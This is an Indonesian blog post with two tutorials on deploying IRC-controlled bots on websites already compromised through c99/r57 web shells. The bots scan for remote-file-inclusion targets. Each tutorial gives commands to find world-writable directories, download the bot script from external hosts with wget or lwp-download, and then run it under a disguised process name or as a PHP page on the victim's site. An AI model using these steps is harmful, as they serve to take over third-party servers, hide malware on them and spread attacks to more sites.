Rabu, 03 September 2008

Cara Pembuatan Bot PHP di mIRC Lewat Shell Injection

Ini adalah salah satu cara pembuatan bot PHP di mIRC. Bot ini adalah salah satu alternatif pembuatan bot selain menggunakan tcl. Anda bisa mengambil scriptnya di page script collections pada blog saya ini. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

Langkah-langkahnya adalah sebagai berikut :

1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
2. Masuk ke shell web injection anda
3. Cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
4. Yang perlu diingat adalah cari directory yang memberikan permission lengkap ato 777 di subdirektori dari public html web tersebut. Maksudnya adalah untuk dapat mengakses dan membuat botnya. Jadi anda tidak bisa menguploadnya ke directory tmp.
5. Setelah anda menemukan direktori yang cocok, wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya saya, jadi commandnya “wget geocities.com/rah_polenk/files/bot.txt”
6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/rah_polenk/files/bot.txt”
7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/bot.txt
8. Saya anggap script tersebut udah di upload, maka gantilah nama filenya dengan command “mv bot.txt bot.php”
9. Ingatlah.. bahwa anda harus menguploadnya ke subdirectory dari public html web yang anda injeksi. semisal seperti ini, nama webnya adalah www.target.com dan saya menguploadnya ke subdirectory module. jadi link untuk mengaksesnya adalah www.target.com/module/bot.php
10. Maka arahkan browser anda dengan membuka link bot anda. jadi bukalah link www.target.com/module/bot.php
11. Ikuti langkah pembuatannya..
12. Masuklah ke channel IRC tempat anda mensetting dimana bot anda akan muncul
13. Jika berhasil, maka bot akan pm/pv anda
14. Kemudian ketik “!auth password” contohnya “!auth lenkganteng” agar anda dikenali oleh botnya
15. Dan untuk melihat list helpnya ketik “!help”

Ket :

1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)

Sekian.. semoga membantu…

Cara Membuat Bot Scan RFI di mIRC


Ditulis oleh Entonk/pada 26 Agustus, 2008

Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

ok.. kita mulai.

  1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell anda
  3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
  8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
  9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
  10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
  11. Silahkan dipergunakan sebaik mungkin

Ket :

  1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

Semoga membantu…
Credit to : dr.pluto

Editing sedikit :

banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut

  • Shell lambat
  • Script yang tidak mau jalan di shell

sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..

Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu.. :D